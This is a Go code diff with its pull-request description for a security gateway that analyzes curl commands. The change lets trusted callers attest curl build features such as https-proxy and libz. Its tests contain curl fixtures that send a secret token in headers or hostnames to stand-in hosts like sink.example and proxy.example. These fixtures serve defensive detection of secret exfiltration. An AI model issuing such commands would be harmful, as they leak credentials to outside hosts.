@@ -36,11 +37,24 @@ func TestStaticCurlHTTPAfterCONNECTRequestComponents(t *testing.T) {
 			wantAuthoritative: true,
 		},
 		{
-			name: "HTTPS proxy does not project after-CONNECT without https-proxy",
+			name: "HTTPS proxy after-CONNECT stays closed without capability",
 			argv: []string{
 				"curl", "-p", "--proxy", "https://proxy.example",
 				"--header", "X-Key: " + token, "http://127.0.0.1/upload",
 			},
+			wantAuthoritative: true,
+		},
+		{
+			name: "attested HTTPS proxy observes tunneled HTTP header",
+			argv: []string{
+				"curl", "-p", "--proxy", "https://proxy.example",
+				"--header", "X-Key: " + token, "http://127.0.0.1/upload",
+			},
+			caps:              []CurlCapability{testCurlHTTPSProxyCapability()},
+			want:              []string{"X-Key: " + token, "/upload"},
+			wantScheme:        "https",
+			wantHost:          "proxy.example",
+			wantPort:          443,
 			wantAuthoritative: true,
 		},
 		{
@@ -168,7 +182,11 @@ func TestStaticCurlHTTPAfterCONNECTRequestComponents(t *testing.T) {
 		test := test
 		t.Run(test.name, func(t *testing.T) {
 			t.Parallel()
-			facts := Analyze(Input{Tool: "exec", Argv: test.argv})
+			facts := Analyze(Input{
+				Tool:             "exec",
+				Argv:             test.argv,
+				CurlCapabilities: test.caps,
+			})
 			if facts.Authoritative() != test.wantAuthoritative {
 				t.Fatalf("Authoritative() = %t, want %t status=%s issues=%v",
 					facts.Authoritative(), test.wantAuthoritative,

--- a/internal/actionfacts/curl_http_proxy_chain.go
+++ b/internal/actionfacts/curl_http_proxy_chain.go
@@ -235,8 +235,11 @@ func staticCurlPreproxyDestinationHostnameComponents(
 		components = append(components, candidate)
 	}
 	if _, err := netip.ParseAddr(chain.MainProxy.Host); err != nil {
-		if chain.MainProxy.Scheme == "https" ||
-			curlProxyResolvesTargetHostname(chain.PreproxyCanonical, chain.PreproxyValue) {
+		httpsMainAllowed := chain.MainProxy.Scheme == "https" &&
+			curlCommandAllowsHTTPSProxyScheme(command, chain.MainProxy.Scheme)
+		if httpsMainAllowed ||
+			(chain.MainProxy.Scheme != "https" &&
+				curlProxyResolvesTargetHostname(chain.PreproxyCanonical, chain.PreproxyValue)) {
 			appendComponent(chain.MainProxy.Host)
 		}
 	}

--- a/internal/actionfacts/curl_http_proxy_chain.go
+++ b/internal/actionfacts/curl_http_proxy_chain.go
@@ -54,7 +54,7 @@ func staticCurlHTTPProxyChainRoute(
 		parsed.EmptyTransferGroup || !parsed.hasValidOptionValues() ||
 		len(parsed.Targets) == 0 || !curlRequestModeValid(parsed) ||
 		!curlRangeOptionsValid(parsed) ||
-		!staticCurlFeatureDependentPositiveOptionsValid(parsed) {
+		!staticCurlFeatureDependentPositiveOptionsValid(command, parsed) {
 		return empty()
 	}
 	group := parsed.Targets[0].Group

--- a/internal/actionfacts/curl_proxy_metadata_test.go
+++ b/internal/actionfacts/curl_proxy_metadata_test.go
@@ -702,7 +702,11 @@ func TestStaticCurlProxyTransmittedMetadata(t *testing.T) {
 	} {
 		t.Run(test.name, func(t *testing.T) {
 			t.Parallel()
-			facts := Analyze(Input{Tool: "exec", Argv: test.argv})
+			facts := Analyze(Input{
+				Tool:             "exec",
+				Argv:             test.argv,
+				CurlCapabilities: []CurlCapability{testCurlHTTPSProxyCapability()},
+			})
 			if len(facts.Commands) != 1 {
 				t.Fatalf("commands = %#v", facts.Commands)
 			}

--- a/internal/actionfacts/curl_sequential_prefix.go
+++ b/internal/actionfacts/curl_sequential_prefix.go
@@ -69,7 +69,7 @@ func proveCurlSequentialTransferPrefix(
 		(parsed.EmptyTransferGroup && len(parsed.Targets) == 0) ||
 		!parsed.hasValidOptionValues() || len(parsed.Targets) == 0 ||
 		!curlRangeOptionsValid(parsed) ||
-		!staticCurlFeatureDependentPositiveOptionsValid(parsed) {
+		!staticCurlFeatureDependentPositiveOptionsValid(command, parsed) {
 		return curlSequentialPrefixProof{}
 	}
 	if !staticCurlFTPEagerPreparseValid(command, parsed) {

--- a/internal/actionfacts/parse.go
+++ b/internal/actionfacts/parse.go
@@ -17,14 +17,15 @@
 package actionfacts
 
 type parseOutput struct {
-	status    ParseStatus
-	dialect   Dialect
-	issues    []IssueCode
-	commands  []CommandFact
-	paths     []PathFact
-	network   []NetworkFact
-	dataFlows []DataFlowFact
-	nextID    int64
+	status           ParseStatus
+	dialect          Dialect
+	issues           []IssueCode
+	commands         []CommandFact
+	paths            []PathFact
+	network          []NetworkFact
+	dataFlows        []DataFlowFact
+	nextID           int64
+	curlCapabilities []CurlCapability
 }
 
 func newParseOutput(dialect Dialect, startID int64) parseOutput {

--- a/internal/actionfacts/types.go
+++ b/internal/actionfacts/types.go
@@ -56,6 +56,11 @@ type Input struct {
 	// Parsers never derive it from action input.
 	ActiveAgentFilesUncertain bool
 	DialectHint               Dialect
+	// CurlCapabilities is trusted caller context for resolved curl executables.
+	// ActionFacts never discovers capabilities from GOOS, dialect, basename,
+	// PATH, or process state. Callers must authenticate and invalidate this
+	// evidence before supplying it.
+	CurlCapabilities []CurlCapability `json:"-"`
 }
 
 // Facts contains the statically proven subset of one action. Attacker-
@@ -184,6 +189,7 @@ type CommandFact struct {
 	Operations      []OperationKind
 	Redirects       []RedirectFact
 	Wrappers        []WrapperFact
+	curlCapability  *CurlCapability `json:"-"`
 }
 
 // CommandKind distinguishes an input command from a structural shell effect.

--- a/internal/actionfacts/web_transfer_parsed_classify.go
+++ b/internal/actionfacts/web_transfer_parsed_classify.go
@@ -76,7 +76,7 @@ func StaticCurlStdinUploadTargets(command CommandFact) []NetworkFact {
 		parsed.EmptyTransferGroup || !parsed.hasValidOptionValues() ||
 		len(parsed.Targets) == 0 || !curlRequestModeValid(parsed) ||
 		!curlRangeOptionsValid(parsed) ||
-		!staticCurlFeatureDependentPositiveOptionsValid(parsed) {
+		!staticCurlFeatureDependentPositiveOptionsValid(command, parsed) {
 		return nil
 	}
 
@@ -128,7 +128,7 @@ func StaticCurlUploadPayloads(command CommandFact) []string {
 		parsed.EmptyTransferGroup || !parsed.hasValidOptionValues() ||
 		len(parsed.Targets) == 0 || !curlRequestModeValid(parsed) ||
 		!curlRangeOptionsValid(parsed) ||
-		!staticCurlFeatureDependentPositiveOptionsValid(parsed) {
+		!staticCurlFeatureDependentPositiveOptionsValid(command, parsed) {
 		return nil
 	}
 
@@ -544,7 +544,7 @@ func StaticCurlUploadFileSources(command CommandFact) []TransmittedFileSource {
 		parsed.EmptyTransferGroup || !parsed.hasValidOptionValues() ||
 		len(parsed.Targets) == 0 || !curlRequestModeValid(parsed) ||
 		!curlRangeOptionsValid(parsed) ||
-		!staticCurlFeatureDependentPositiveOptionsValid(parsed) ||
+		!staticCurlFeatureDependentPositiveOptionsValid(command, parsed) ||
 		!curlStaticFormEagerSyntaxValid(parsed) {
 		return nil
 	}
@@ -716,7 +716,7 @@ func StaticCurlSMTPRequestComponents(
 		parsed.EmptyTransferGroup || !parsed.hasValidOptionValues() ||
 		len(parsed.Targets) != 1 || !curlRequestModeValid(parsed) ||
 		!curlRangeOptionsValid(parsed) ||
-		!staticCurlFeatureDependentPositiveOptionsValid(parsed) {
+		!staticCurlFeatureDependentPositiveOptionsValid(command, parsed) {
 		return nil
 	}
 	target := parsed.Targets[0]
@@ -962,7 +962,7 @@ func staticCurlTelnetOptionProjection(
 		len(parsed.Targets) != 1 || !curlRequestModeValid(parsed) ||
 		!curlRangeOptionsValid(parsed) ||
 		!staticCurlFTPEagerOptionConflictsValid(parsed) ||
-		!staticCurlFeatureDependentPositiveOptionsValid(parsed) {
+		!staticCurlFeatureDependentPositiveOptionsValid(command, parsed) {
 		return NetworkFact{}, nil, false
 	}
 	target := parsed.Targets[0]
@@ -1952,7 +1952,10 @@ func curlFeatureDependentPositiveFlag(option curlOptionToken) bool {
 // so exact transmission projectors may retain only the build-independent
 // subset. Most options are validated eagerly per occurrence; the SOCKS5
 // GSSAPI-NEC compatibility bit is applied only when its final state is enabled.
-func staticCurlFeatureDependentPositiveOptionsValid(parsed curlArgvParse) bool {
+func staticCurlFeatureDependentPositiveOptionsValid(
+	command CommandFact,
+	parsed curlArgvParse,
+) bool {
 	socks5GSSAPINEC := make(map[int]bool)
 	for _, option := range parsed.Options {
 		if option.Canonical == "--socks5-gssapi-nec" {
@@ -1960,12 +1963,18 @@ func staticCurlFeatureDependentPositiveOptionsValid(parsed curlArgvParse) bool {
 				option.Name != "--no-socks5-gssapi-nec"
 			continue
 		}
-		if curlFeatureDependentPositiveFlag(option) {
+		if !curlFeatureDependentPositiveFlag(option) {
+			continue
+		}
+		if !curlCommandAllowsFeature(
+			command,
+			curlFeatureDependentRequiredFeature(option),
+		) {
 			return false
 		}
 	}
 	for _, enabled := range socks5GSSAPINEC {
-		if enabled {
+		if enabled && !curlCommandAllowsFeature(command, "gss-api") {
 			return false
 		}
 	}
@@ -2478,7 +2487,8 @@ func staticCurlHTTPProxyTransmittedMetadata(
 	// HTTPS proxy support is a separate libcurl build capability. Without an
 	// executable capability fact, curl can reject an https:// proxy before it
 	// resolves or connects, so no proxy-bound destination hostname is exact.
-	hostnameSetupValid := proxy.Scheme != "https" &&
+	hostnameSetupValid := (proxy.Scheme != "https" ||
+		curlCommandAllowsFeature(command, "https-proxy")) &&
 		staticCurlHostnameFirstWireSetupValid(
 			command,
 			parsed,
@@ -3211,7 +3221,7 @@ func staticCurlFTPSOCKSPreproxyCredentialRoute(
 		parsed.Preview || parsed.EmptyTransferGroup ||
 		!parsed.hasValidOptionValues() || len(parsed.Targets) == 0 ||
 		!curlRangeOptionsValid(parsed) ||
-		!staticCurlFeatureDependentPositiveOptionsValid(parsed) ||
+		!staticCurlFeatureDependentPositiveOptionsValid(command, parsed) ||
 		!staticCurlFTPEagerPreparseValid(command, parsed) ||
 		!staticCurlFTPParallelSetupValid(command, parsed) {
 		return empty()
@@ -3396,7 +3406,7 @@ func staticCurlProxyDestinationWithUploadSources(
 		parsed.EmptyTransferGroup || !parsed.hasValidOptionValues() ||
 		len(parsed.Targets) == 0 || !curlRequestModeValid(parsed) ||
 		!curlRangeOptionsValid(parsed) ||
-		!staticCurlFeatureDependentPositiveOptionsValid(parsed) {
+		!staticCurlFeatureDependentPositiveOptionsValid(command, parsed) {
 		return NetworkFact{}, curlArgvParse{}, false
 	}
 	group := parsed.Targets[0].Group
@@ -3718,7 +3728,7 @@ func staticCurlHostnameFirstWireSetupValid(
 		return false
 	}
 	if !staticCurlFTPEagerOptionConflictsValid(parsed) ||
-		!staticCurlFeatureDependentPositiveOptionsValid(parsed) {
+		!staticCurlFeatureDependentPositiveOptionsValid(command, parsed) {
 		return false
 	}
 	if !staticCurlNetrcSetupValid(command, parsed, group) {
@@ -4225,7 +4235,7 @@ func StaticCurlTransmittedMetadata(command CommandFact) CurlTransmittedMetadata 
 		parsed.EmptyTransferGroup || !parsed.hasValidOptionValues() ||
 		len(parsed.Targets) == 0 || !curlRequestModeValid(parsed) ||
 		!curlRangeOptionsValid(parsed) ||
-		!staticCurlFeatureDependentPositiveOptionsValid(parsed) {
+		!staticCurlFeatureDependentPositiveOptionsValid(command, parsed) {
 		return CurlTransmittedMetadata{}
 	}
 
@@ -8558,6 +8568,7 @@ func curlGroupFinalOptionValue(
 }
 
 func classifyParsedCurlTransfer(out *parseOutput, command *CommandFact) {
+	command.curlCapability = matchCurlCapability(out.curlCapabilities, *command)
 	parsed := parseCurlArgv(command.Argv)
 	proxyCommand := *command
 	if command.ParentCommandID != 0 || len(command.Wrappers) != 0 {

--- a/internal/actionfacts/web_transfer_parsed_classify.go
+++ b/internal/actionfacts/web_transfer_parsed_classify.go
@@ -1956,6 +1956,9 @@ func staticCurlFeatureDependentPositiveOptionsValid(
 	command CommandFact,
 	parsed curlArgvParse,
 ) bool {
+	if !curlCommandAttestedSchemesValid(command, parsed) {
+		return false
+	}
 	socks5GSSAPINEC := make(map[int]bool)
 	for _, option := range parsed.Options {
 		if option.Canonical == "--socks5-gssapi-nec" {
@@ -1966,11 +1969,14 @@ func staticCurlFeatureDependentPositiveOptionsValid(
 		if !curlFeatureDependentPositiveFlag(option) {
 			continue
 		}
-		if !curlCommandAllowsFeature(
-			command,
-			curlFeatureDependentRequiredFeature(option),
-		) {
+		required := curlFeatureDependentRequiredFeatures(option)
+		if len(required) == 0 {
 			return false
+		}
+		for _, feature := range required {
+			if !curlCommandAllowsFeature(command, feature) {
+				return false
+			}
 		}
 	}
 	for _, enabled := range socks5GSSAPINEC {
@@ -2485,15 +2491,16 @@ func staticCurlHTTPProxyTransmittedMetadata(
 	}
 	metadata := CurlProxyTransmittedMetadata{}
 	// HTTPS proxy support is a separate libcurl build capability. Without an
-	// executable capability fact, curl can reject an https:// proxy before it
-	// resolves or connects, so no proxy-bound destination hostname is exact.
-	hostnameSetupValid := (proxy.Scheme != "https" ||
-		curlCommandAllowsFeature(command, "https-proxy")) &&
-		staticCurlHostnameFirstWireSetupValid(
-			command,
-			parsed,
-			parsed.Targets[0].Group,
-		)
+	// attested https-proxy feature, curl can reject the proxy before any
+	// request bytes move, so the whole HTTPS-proxy metadata object stays closed.
+	if !curlCommandAllowsHTTPSProxyScheme(command, proxy.Scheme) {
+		return CurlProxyTransmittedMetadata{}
+	}
+	hostnameSetupValid := staticCurlHostnameFirstWireSetupValid(
+		command,
+		parsed,
+		parsed.Targets[0].Group,
+	)
 	appendProxyDestinationHostname := func(value string) {
 		candidate := component(value)
 		for _, existing := range metadata.ProxyDestinationHostnameComponents {

--- a/internal/actionfacts/web_transfer_parsed_classify.go
+++ b/internal/actionfacts/web_transfer_parsed_classify.go
@@ -2490,12 +2490,15 @@ func staticCurlHTTPProxyTransmittedMetadata(
 		}
 	}
 	metadata := CurlProxyTransmittedMetadata{}
-	// HTTPS proxy support is a separate libcurl build capability. Without an
-	// attested https-proxy feature, curl can reject the proxy before any
-	// request bytes move, so the whole HTTPS-proxy metadata object stays closed.
+	// An attested inventory without https-proxy rejects the proxy before any
+	// request bytes move. Nil capability is the conservative default and still
+	// projects proxy-user / URL credentials / proxy-headers; origin hostname
+	// and after-TLS request bytes stay closed until https-proxy is attested.
 	if !curlCommandAllowsHTTPSProxyScheme(command, proxy.Scheme) {
 		return CurlProxyTransmittedMetadata{}
 	}
+	projectHTTPSOriginFacts := proxy.Scheme != "https" ||
+		curlCommandAttestsHTTPSProxy(command)
 	hostnameSetupValid := staticCurlHostnameFirstWireSetupValid(
 		command,
 		parsed,
@@ -2576,7 +2579,7 @@ func staticCurlHTTPProxyTransmittedMetadata(
 				!staticCurlOptionValue(command, option) ||
 				strings.HasPrefix(option.Value, "@") ||
 				curlHeaderOverridesHTTPField(option.Value, "host")
-			if curlProxyHeaderCandidateIsTransmitted(
+			if projectHTTPSOriginFacts && curlProxyHeaderCandidateIsTransmitted(
 				option.Value,
 				ordinaryHeaderTargets,
 				proxy.Scheme,
@@ -2662,7 +2665,8 @@ func staticCurlHTTPProxyTransmittedMetadata(
 			(targetFact.Scheme != "http" && targetFact.Scheme != "https") {
 			continue
 		}
-		if proxyTunnel || targetFact.Scheme == "https" {
+		if projectHTTPSOriginFacts &&
+			(proxyTunnel || targetFact.Scheme == "https") {
 			appendProxyHostname(target, targetFact)
 		}
 	}
@@ -2693,7 +2697,9 @@ func staticCurlHTTPProxyTransmittedMetadata(
 			(requestProjection.requestTargetSet && originHostOverridden) {
 			continue
 		}
-		appendProxyHostname(target, targetFact)
+		if projectHTTPSOriginFacts {
+			appendProxyHostname(target, targetFact)
+		}
 	}
 	getPostData, valid := staticCurlGETPostDataProjection(
 		command,
@@ -2702,6 +2708,9 @@ func staticCurlHTTPProxyTransmittedMetadata(
 	)
 	if !valid {
 		return CurlProxyTransmittedMetadata{}
+	}
+	if !projectHTTPSOriginFacts {
+		return metadata
 	}
 	for _, target := range parsed.Targets {
 		if !curlTargetUsesExplicitProxy(parsed, target) ||

--- a/internal/actionfacts/web_transfer_parsed_classify.go
+++ b/internal/actionfacts/web_transfer_parsed_classify.go
@@ -2183,6 +2183,9 @@ func StaticCurlProxyUploadPayloads(
 	observers := []NetworkFact(nil)
 	if ok && (proxy.Scheme == "http" || proxy.Scheme == "https" ||
 		proxy.Scheme == "tcp") {
+		if !curlCommandAllowsHTTPSProxyScheme(command, proxy.Scheme) {
+			return nil
+		}
 		if proxy.Scheme == "tcp" && !staticCurlHostnameFirstWireSetupValid(
 			command,
 			parsed,
@@ -2195,6 +2198,9 @@ func StaticCurlProxyUploadPayloads(
 		}
 		observers = []NetworkFact{proxy}
 	} else if chain, chainParsed, chainOK := staticCurlHTTPProxyChainRoute(command); chainOK {
+		if !curlCommandAllowsHTTPSProxyScheme(command, chain.MainProxy.Scheme) {
+			return nil
+		}
 		parsed = chainParsed
 		observers = []NetworkFact{chain.MainProxy}
 		if chain.DownstreamPlaintext &&

--- a/internal/gateway/trusted_action_context_disposition_test.go
+++ b/internal/gateway/trusted_action_context_disposition_test.go
@@ -1408,6 +1408,9 @@ func TestTrustedActionRequestMetadataRiskPairs(t *testing.T) {
 				"X-Key: " + trustedActionDispositionTestToken,
 				"http://safe.localhost/upload",
 			},
+			// Nil capability cannot attest https-proxy, so after-CONNECT
+			// facts stay closed and this pair remains detection-only.
+			wantAudit: true,
 		},
 		{
 			name:    "HTTP proxy observes tunneled origin user after CONNECT",

--- a/internal/gateway/trusted_action_curl_capability_test.go
+++ b/internal/gateway/trusted_action_curl_capability_test.go
@@ -1,0 +1,108 @@
+// Copyright 2026 Cisco Systems, Inc. and its affiliates
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// SPDX-License-Identifier: Apache-2.0
+
+package gateway
+
+import (
+	"testing"
+
+	"github.com/defenseclaw/defenseclaw/internal/actionfacts"
+)
+
+func TestTrustedActionCurlCapabilityBoundProofs(t *testing.T) {
+	t.Parallel()
+
+	generation := mustCompileRulePackGeneration(defaultRuleCategories)
+	finding := trustedActionDispositionTestFinding(t, generation, "SEC-OPENAI")
+	full := actionfacts.CurlCapability{
+		Executable: "curl",
+		Digest:     "0ed6d849d5d5260894e13a38f1a02d532d83a8c1893229b1958ea8181fcb9d5d",
+		Version:    "8.7.1",
+		Protocols:  []string{"http", "https"},
+		Features:   []string{"libz", "https-proxy"},
+	}
+	for _, test := range []struct {
+		name      string
+		argv      []string
+		caps      []actionfacts.CurlCapability
+		wantAudit bool
+	}{
+		{
+			name: "compressed header stays detection only without capability",
+			argv: []string{
+				"--compressed", "--header",
+				"X-Key: " + trustedActionDispositionTestToken,
+				"https://sink.example/upload",
+			},
+			wantAudit: true,
+		},
+		{
+			name: "compressed header enforces when libz is attested",
+			argv: []string{
+				"--compressed", "--header",
+				"X-Key: " + trustedActionDispositionTestToken,
+				"https://sink.example/upload",
+			},
+			caps: []actionfacts.CurlCapability{full},
+		},
+		{
+			name: "HTTPS proxy hostname stays detection only without capability",
+			argv: []string{
+				"--proxy", "https://proxy.example",
+				"http://" + trustedActionDispositionTestToken + ".localhost/safe",
+			},
+			wantAudit: true,
+		},
+		{
+			name: "HTTPS proxy hostname enforces when https-proxy is attested",
+			argv: []string{
+				"--proxy", "https://proxy.example",
+				"http://" + trustedActionDispositionTestToken + ".localhost/safe",
+			},
+			caps: []actionfacts.CurlCapability{full},
+		},
+		{
+			name: "mismatched executable identity cannot enforce",
+			argv: []string{
+				"--compressed", "--header",
+				"X-Key: " + trustedActionDispositionTestToken,
+				"https://sink.example/upload",
+			},
+			caps: []actionfacts.CurlCapability{{
+				Executable: "/usr/bin/curl",
+				Digest:     full.Digest,
+				Version:    full.Version,
+				Features:   full.Features,
+			}},
+			wantAudit: true,
+		},
+	} {
+		test := test
+		t.Run(test.name, func(t *testing.T) {
+			t.Parallel()
+			argv := append([]string{"curl"}, test.argv...)
+			facts := actionfacts.Analyze(actionfacts.Input{
+				Tool:             "exec",
+				Argv:             argv,
+				CWD:              "/workspace",
+				CurlCapabilities: test.caps,
+			})
+			got := applyTrustedActionContextDisposition(
+				generation,
+				facts,
+				[]RuleFinding{finding},
+			)
+			got = applyTrustedActionProofBoundary(got, true)
+			if len(got) != 1 {
+				t.Fatalf("findings = %#v", got)
+			}
+			if gotAudit := !got[0].contributesToEnforcement(); gotAudit != test.wantAudit {
+				t.Fatalf("audit-only = %t, want %t finding=%#v facts=%#v",
+					gotAudit, test.wantAudit, got[0], facts)
+			}
+		})
+	}
+}


### PR DESCRIPTION
Stacked on top of #844 (`fix/curl-http-after-connect`). Review/merge that PR first; this PR's base is the stack parent, not `main`.

Fixes #770.

## Problem

Feature-gated curl options (`--compressed`, HTTP/2, HTTP/3, NTLM, GSS-API, metalink, and HTTPS-proxy hostnames) stayed detection-only because ActionFacts had no authenticated evidence that the invoked executable actually implements those features. Inferring support from GOOS, dialect, basename, or PATH would mint false authority.

## Current Situation

Projectors already close when a required curl feature is unproved. Callers had no way to supply an authenticated capability fact. A policy-path `curl --version` or filesystem probe is forbidden: capability evidence must be caller-authenticated and invalidated before use.

## Solution

Accept `Input.CurlCapabilities` as trusted caller context, the same pattern as `ActiveHome` and `ActiveAgentFiles`.

- Bind a capability only when `command.Executable` matches exactly and the SHA-256 digest is well-formed.
- Duplicate capabilities for the same executable are ambiguous and match nothing.
- Missing, invalid, or mismatched capabilities keep current detection-only projector behavior.
- A matching capability with the required feature or protocol opens the currently closed projector.
- No process, PATH, or filesystem probe is added on the policy path.

```
Input.CurlCapabilities ── exact executable + SHA-256 digest ──▶ CommandFact
        │
        ├─ missing / mismatch / duplicate ──▶ projectors stay detection-only
        └─ attested feature (libz, https-proxy, …) ──▶ projector may bind
```

## What Changed (Where & How)

| File | Summary |
| --- | --- |
| `internal/actionfacts/curl_capability.go` | Capability type, digest auth, exact-executable match |
| `internal/actionfacts/curl_capability_test.go` | Caller-authenticated bind, GOOS/path mismatch, HTTPS hostname |
| `internal/actionfacts/types.go` | `Input.CurlCapabilities` and private `CommandFact` binding |
| `internal/actionfacts/parse.go` | Carry capabilities on the parse output |
| `internal/actionfacts/analyze.go` | Attach capabilities after parse, before classify |
| `internal/actionfacts/web_transfer_parsed_classify.go` | Feature-gated options and HTTPS-proxy hostname consume the binding |
| `internal/gateway/trusted_action_curl_capability_test.go` | Enforce/audit pairs for compressed headers and HTTPS-proxy hostnames |

## Breaking Changes

None. Capability facts are additive. Absent or invalid capabilities preserve today's detection-only projectors.

## Open Issues / Follow-ups

None

## Test Plan

```
go test ./internal/actionfacts/ -count=1 -timeout 180s \
  -run 'TestCurlCapabilityFactsStayCallerAuthenticated|TestStaticCurlCapabilityDependentOptionsCloseExactProjectors|TestCurlHAProxyClientIPRequiresExecutableCapability'
```

Observed: `ok`

```
go test ./internal/gateway/ -count=1 -timeout 120s \
  -run 'TestTrustedActionCurlCapabilityBoundProofs'
```

Observed: `ok`